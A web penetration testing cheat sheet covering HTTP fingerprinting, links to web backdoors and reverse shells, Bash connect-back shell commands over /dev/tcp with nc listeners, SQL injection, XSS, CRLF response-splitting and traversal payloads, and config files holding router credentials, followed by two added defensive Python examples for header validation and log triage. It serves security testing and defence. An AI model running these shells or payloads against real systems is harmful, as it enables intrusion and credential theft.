HTTP (80/8080/8888 etc)
Fingerprint server

  telnet ip_address port
  Firefox plugins

Crawl website

  lynx [options] startfile/URL
    Options include -traversal -crawl -dump -image_links -source
  httprint
  Metagoofil: metagoofil.py -d [domain] -l [no. of] -f [type] -o results.html

Web Directory enumeration

Vulnerability Assessment

  Manual Tests

    Default Passwords

    Install Backdoors
      ASP:      https://packetstormsecurity.org/UNIX/penetration/aspxshell.aspx.txt
      Assorted: https://michaeldaw.org/projects/web-backdoor-compilation/
                https://open-labs.org/hacker_webkit02.tar.gz
      Perl:     https://home.arcor.de/mschierlm/test/pmsh.pl
                https://pentestmonkey.net/tools/perl-reverse-shell/
                https://freeworld.thc.org/download.php?t=r&f=rwwwshell-2.0.pl.gz
      PHP:      https://php.spb.ru/remview/
                https://pentestmonkey.net/tools/php-reverse-shell/
                https://pentestmonkey.net/tools/php-findsock-shell/
      Python:   https://matahari.sourceforge.net/
      TCL:      https://www.irmplc.com/download_pdf.php?src=Creating_Backdoors_in_Cisco_IOS_using_Tcl.pdf&force=yes

    Bash Connect Back Shell
      GnuCitizen
        Attack Box: nc -l -p Port -vvv
        Victim: $ exec 5<>/dev/tcp/IP_Address/Port
        Victim: $ cat <&5 | while read line; do $line 2>&5 >&5; done
      Neohapsis
        Attack Box: nc -l -p Port -vvv
        Victim: $ exec 0</dev/tcp/IP_Address/Port    # First we copy our connection over stdin
        Victim: $ exec 1>&0                           # Next we copy stdin to stdout
        Victim: $ exec 2>&0                           # And finally stdin to stderr
        Victim: $ exec /bin/sh 0</dev/tcp/IP_Address/Port 1>&0 2>&0

    Method Testing
      nc IP_Address Port
        HEAD / HTTP/1.0
        OPTIONS / HTTP/1.0
        PROPFIND / HTTP/1.0
        TRACE / HTTP/1.1
        PUT https://Target_URL/FILE_NAME
        POST https://Target_URL/FILE_NAME HTTP/1.x

    Upload Files
      curl
        curl -u <username:password> -T file_to_upload <Target_URL>
        curl -A "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" <Target_URL>
      put.pl
        put.pl -h target -r /remote_file_name -f local_file_name
      webdav

    View Page Source
      Hidden Values
      Developer Remarks
      Extraneous Code
      Passwords!

    Input Validation Checks
      NULL or null                  Possible error messages returned.
      ' , " , ; , <!                Breaks an SQL string or query; used for SQL, XPath and XML Injection tests.
      -- , = , + , "                Used to craft SQL Injection queries.
      ' , & , ! , | , < , >         Used to find command execution vulnerabilities.
      "><script>alert(1)</script>   Basic Cross-Site Scripting Checks.
      %0d%0a                        Carriage Return (%0d) Line Feed (%0a)
        HTTP Splitting:
          language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Insert undesirable content here</html>
          i.e. the server emits
            Content-Length: 0

            HTTP/1.1 200 OK
            Content-Type: text/html
            Content-Length: 47

            <html>blah</html>
        Cache Poisoning:
          language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20304%20Not%20Modified%0d%0aContent-Type:%20text/html%0d%0aLast-Modified:%20Mon,%2027%20Oct%202003%2014:50:18%20GMT%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Insert undesirable content here</html>
      %7f , %ff                     Byte-length overflows; maximum 7- and 8-bit values.
      -1, other                     Integer and underflow vulnerabilities.
      %n , %x , %s                  Testing for format string vulnerabilities.
      ../                           Directory Traversal Vulnerabilities.
      % , _ , *                     Wildcard characters can sometimes present DoS issues or information disclosure.
      Ax1024+                       Overflow vulnerabilities.

    Automated table and column iteration
      orderby.py:    ./orderby.py www.site.com/index.php?id=
      d3sqlfuzz.py:  ./d3sqlfuzz.py www.site.com/index.php?id=-1+UNION+ALL+SELECT+1,COLUMN,3+FROM+TABLE--

  Vulnerability Scanners

  Specific Applications / Server Tools
    Domino
    Joomla
      cms_few
      joomsq
      joomlascan:  ./joomlascan.py <site> <options>
                   options i.e. -p/-proxy <host:port> : Add proxy support; -404 : Don't show 404 responses
      joomscan:    ./joomscan.py -u "www.site.com/joomladir/" -o site.txt -p 127.0.0.1:80
      jscan:       jscan.pl -f hostname (shell.txt required)
      aspaudit.pl: asp-audit.pl https://target/app/filename.aspx (options i.e. -bf)
    Vbulletin
      vbscan.py:   vbscan.py <host> <port> -v
                   vbscan.py -update
    ZyXel
      zyxel-bf.sh
      snmpwalk:    snmpwalk -v2c -c public IP_Address 1.3.6.1.4.1.890.1.2.1.2
      snmpget:     snmpget -v2c -c public IP_Address 1.3.6.1.4.1.890.1.2.1.2.6.0

  Proxy Testing

  Examine configuration files
    Generic:   Examine httpd.conf / Windows config files
    JBoss:     JMX Console https://<IP>:8080/jmx-console/
    Joomla:    configuration.php, diagnostics.php, joomla.inc.php, config.inc.php
    Mambo:     configuration.php, config.inc.php
    WordPress: setup-config.php, wp-config.php
    ZyXel:
      /WAN.html (contains PPPoE ISP password)
      /WLAN_General.html and /WLAN.html (contains WEP key)
      /rpDyDNS.html (contains DDNS credentials)
      /Firewall_DefPolicy.html (Firewall)
      /CF_Keyword.html (Content Filter)
      /RemMagWWW.html (Remote MGMT)
      /rpSysAdmin.html (System)
      /LAN_IP.html (LAN)
      /NAT_General.html (NAT)
      /ViewLog.html (Logs)
      /rpFWUpload.html (Tools)
      /DiagGeneral.html (Diagnostic)
      /RemMagSNMP.html (SNMP Passwords)
      /LAN_ClientList.html (Current DHCP Leases)
      Config Backups: /RestoreCfg.html, /BackupCfg.html
      Note: the above config files are not human readable; a separate tool is required to break out possible admin credentials and other important settings.

  Examine web server logs
    c:\winnt\system32\Logfiles\W3SVC1
    awk -F " " '{print $3,$11}' filename | sort | uniq

References

Exploit Frameworks
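The HTTP Splitting row above shows the payload but not why it works or what the server-side fix looks like. The Python below is an added example, not code from the original cheat sheet: a hypothetical language-switch handler that decodes the `language` parameter and copies it into a Set-Cookie header, a counter for how many responses a downstream proxy or browser would see in the resulting byte stream, and a hardened variant that validates the value after decoding. The handler, its header layout and all function names are assumptions; the payload string is the one from the table.

```python
"""HTTP response splitting: why the language= payload above works, and the fix.
Added example: the handler and its header layout are hypothetical; the payload is
the one from the cheat sheet's Input Validation Checks table."""
from urllib.parse import unquote

# The table's HTTP Splitting payload, as it would arrive URL-encoded in the query string.
SPLITTING_PAYLOAD = (
    "foobar%0d%0aContent-Length:%200%0d%0a%0d%0a"
    "HTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0a"
    "Content-Length:%2047%0d%0a%0d%0a<html>Insert undesirable content here</html>"
)


class HeaderInjection(ValueError):
    """Raised when a value destined for a response header contains line breaks."""


def build_response_vulnerable(language: str) -> str:
    """Hypothetical language switcher that decodes the parameter and copies it
    straight into a Set-Cookie header. Nothing stops %0d%0a from becoming CRLF."""
    value = unquote(language)
    return (
        "HTTP/1.1 302 Found\r\n"
        f"Set-Cookie: lang={value}\r\n"
        "Location: /index.html\r\n"
        "\r\n"
    )


def safe_header_value(value: str) -> str:
    """Validate after decoding: a header value must be a single line.
    CR, LF and NUL are rejected rather than stripped, so the attempt stays visible."""
    decoded = unquote(value)
    if any(ch in decoded for ch in "\r\n\x00"):
        raise HeaderInjection(f"line break in header value: {value[:40]!r}")
    return decoded


def build_response_hardened(language: str) -> str:
    """Same handler, with the value checked before it reaches the header."""
    value = safe_header_value(language)
    return (
        "HTTP/1.1 302 Found\r\n"
        f"Set-Cookie: lang={value}\r\n"
        "Location: /index.html\r\n"
        "\r\n"
    )


def count_responses(raw: str) -> int:
    """How many HTTP responses a proxy or browser would see in one byte stream:
    every line that begins with a status line starts a new response."""
    return sum(1 for line in raw.split("\r\n") if line.startswith("HTTP/1."))


def is_splitting_attempt(param: str) -> bool:
    """Log-review helper: true if a parameter decodes to anything containing CR or LF."""
    decoded = unquote(param)
    return "\r" in decoded or "\n" in decoded


if __name__ == "__main__":
    print("vulnerable:", count_responses(build_response_vulnerable(SPLITTING_PAYLOAD)), "responses")
    try:
        build_response_hardened(SPLITTING_PAYLOAD)
    except HeaderInjection as exc:
        print("hardened:", exc)
```

The vulnerable handler turns one request into two responses, which is exactly the condition a shared cache needs for the Cache Poisoning variant in the same row. In a real application the check belongs in the framework's header/cookie API (most modern ones already reject CR/LF), and the `language` value itself should be matched against a short allow-list of language codes rather than echoed.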
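The awk one-liner under Examine web server logs prints two positional fields from an IIS W3SVC log, which silently breaks when the logging configuration changes the column order. As an added example, not code from the original page, the Python below reads the `#Fields:` header instead of assuming positions, produces the same client/URI tally, and tags requests whose decoded query string or method matches the probe patterns listed under Input Validation Checks and Method Testing. The log lines are constructed samples, and the field list is one common IIS W3C layout, both assumptions of this example.

```python
"""IIS W3C log review: the awk one-liner's IP/URI tally, plus tagging of requests
that carry the probe patterns from the Input Validation Checks and Method Testing
sections. Added example with constructed log lines (not a real capture)."""
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample log. IIS writes a #Fields line naming the columns; the
# order below is one common configuration and is an assumption of this example.
SAMPLE_LOG = "\n".join([
    "#Software: Microsoft Internet Information Services 6.0",
    "#Version: 1.0",
    "#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query c-ip cs(User-Agent) sc-status",
    "2003-10-27 14:50:18 10.0.0.5 GET /index.php id=1 192.0.2.10 Mozilla/4.0 200",
    "2003-10-27 14:50:19 10.0.0.5 GET /index.php id=-1+UNION+ALL+SELECT+1,2,3+FROM+users-- 192.0.2.10 Mozilla/4.0 500",
    "2003-10-27 14:50:20 10.0.0.5 GET /lang.php language=foobar%0d%0aContent-Length:%200 192.0.2.10 Mozilla/4.0 302",
    "2003-10-27 14:50:21 10.0.0.5 GET /download.php file=../../../../etc/passwd 192.0.2.11 lynx/2.8 404",
    "2003-10-27 14:50:22 10.0.0.5 GET /search.php q=%22%3E%3Cscript%3Ealert(1)%3C/script%3E 192.0.2.11 lynx/2.8 200",
    "2003-10-27 14:50:23 10.0.0.5 OPTIONS / - 192.0.2.12 - 200",
    "2003-10-27 14:50:24 10.0.0.5 GET /page.php name=" + "A" * 1100 + " 192.0.2.12 - 200",
])

# Patterns applied to the percent-decoded query string, one per cheat sheet row.
DECODED_PROBES = [
    ("crlf", re.compile(r"[\r\n]")),                            # %0d%0a: splitting / cache poisoning
    ("traversal", re.compile(r"\.\./")),                         # ../
    ("xss", re.compile(r"<script", re.I)),                       # "><script>alert(1)</script>
    ("sqli", re.compile(r"'|--|\bunion\b.*\bselect\b", re.I)),   # ' and -- (a subset of the table's list)
    ("format_string", re.compile(r"%[nxs]")),                    # %n %x %s survive percent-decoding
    ("long_input", re.compile(r"A{1024,}")),                     # Ax1024+
]
# %7f / %ff are matched on the raw query, because decoding turns them into bytes.
RAW_PROBES = [("high_byte", re.compile(r"%(7f|ff)", re.I))]
EXPECTED_METHODS = {"GET", "POST", "HEAD"}


def parse_w3c(text):
    """Parse W3C extended log text into dicts keyed by the names in #Fields."""
    fields, records = [], []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split(":", 1)[1].split()
        elif line.startswith("#") or not line.strip():
            continue
        else:
            values = line.split()  # IIS replaces spaces inside values with '+'
            if fields and len(values) == len(fields):
                records.append(dict(zip(fields, values)))
    return records


def probe_tags(record):
    """Return the list of probe tags that apply to one request."""
    raw_query = record.get("cs-uri-query", "-")
    decoded = unquote_plus(raw_query) if raw_query != "-" else ""
    tags = [name for name, rx in DECODED_PROBES if rx.search(decoded)]
    tags += [name for name, rx in RAW_PROBES if rx.search(raw_query)]
    if record.get("cs-method", "GET") not in EXPECTED_METHODS:
        tags.append("uncommon_method")  # OPTIONS, PROPFIND, TRACE, PUT ...
    return tags


def flag_probes(records):
    """Keep only requests with at least one tag, for analyst review."""
    flagged = []
    for rec in records:
        tags = probe_tags(rec)
        if tags:
            flagged.append({"c-ip": rec["c-ip"], "cs-uri-stem": rec["cs-uri-stem"], "tags": tags})
    return flagged


def top_clients(records):
    """The awk '{print $3,$11} | sort | uniq' idea, by field name: (c-ip, cs-uri-stem) counts."""
    return Counter((r["c-ip"], r["cs-uri-stem"]) for r in records)


if __name__ == "__main__":
    recs = parse_w3c(SAMPLE_LOG)
    for (ip, stem), n in top_clients(recs).most_common():
        print(f"{n:4d}  {ip:<12} {stem}")
    for f in flag_probes(recs):
        print(f"{f['c-ip']:<12} {f['cs-uri-stem']:<16} {', '.join(f['tags'])}")
```

Run it against a real W3SVC1 file by replacing `SAMPLE_LOG` with the file contents; the `#Fields:` line in that file drives the column names, so `c-ip` and `cs-uri-stem` resolve correctly whatever the position. The patterns are deliberately the coarse ones from the table and will produce false positives (a legitimate `--` in a search term, for instance), so treat the output as a triage list rather than an alert.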